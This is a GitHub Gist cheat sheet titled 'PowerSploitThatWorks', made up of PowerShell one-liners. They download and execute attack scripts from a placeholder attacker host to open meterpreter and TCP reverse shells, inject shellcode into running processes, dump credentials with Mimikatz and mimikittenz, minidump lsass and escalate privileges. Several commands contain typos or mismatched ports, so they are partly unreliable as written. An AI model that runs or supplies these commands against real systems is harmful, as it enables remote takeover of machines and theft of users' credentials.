Created
August 10, 2018 20:31
-
-
Save alexandercastillo1/b721e56401374e5c8f636aea93b15697 to your computer and use it in GitHub Desktop.
PowerSploitThatWorks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PowerSploit - Code Execution (Reverse Shell using meterpreter) | |
| Invoke-Shellcode | |
| cd /Tools/PowerSploit/CodeExecution/ | |
| python -m SimpleHTTPServer 7001 | |
| cd /Tools/fast_meterpreter.rb | |
| ATTACKERIP - LISTENERPORT - 1 - no - http://ATTACKERIP/WEBSERVERPORT(7001) - | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7001/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost X.X.X.X -lport XXXX -Force" | |
| PowerSploit - Code Execution (Reverse Shell) | |
| cd /Tools/PowerSploit/CodeExecution/ | |
| python -m SimpleHTTPServer 7008 | |
| powershell -NoProfile -ExecutionPolicy unrestrcited -Command IEX (New-Object Net.WebClient).DownloadString('http://IPADDRESS:7008/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ATTACKERIP -Port XXXX; | |
| Invoke-Shellcode (Inject reverse_shell in an existing process) | |
| On victim: Get-Process (Find stable process) | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7001/Invoke-Shellcode.ps1'); Invoke-Shellcode -ProcessID XXX -Payload windows/meterpreter/reverse_http -lhost X.X.X.X -lport XXXX" | |
| PowerSploit - Exfiltration | |
| Invoke-Mimikatz (32bits) | |
| cd /Tools/PowerSploit/Invoke-Mimikatz.ps1 | |
| python -m SimpleHTTPServer 7002 | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7002/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| Invoke-Mimikatz (64bits) | |
| Search for lsass process id under Powershell using "Get-Process" | |
| cd /Tools/PowerSploit/Invoke-Mimikatz.ps1 | |
| python -m SimpleHTTPServer 7002 | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7002/Out-Minidump.ps1')";Get-Process -Id XXX;" | |
| PowerSploit - Privesc | |
| PowerUp | |
| cd /Tools/PowerSploit | |
| python m SimpleHTTPServer 7003 | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7003/PowerUp.ps1')"; Invoke-AllChecks;" | |
| Privilege Escalation - Ikeext-Privesc | |
| cd /Tools/Ikeext-Privesc | |
| python -m SimpleHTTPServer 7004 | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://IPADRESS:7004/Ikeext-Privesc.ps1'); InvokeCheck -verbose;" | |
| PostExploitation - Mimikittenz | |
| cd /Tools/mimikittenz | |
| python -m SimpleHTTPServer 7007 | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://IPADRESS:7006/Invoke-mimikittenz.ps1');Invoke-mimikittenz;" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment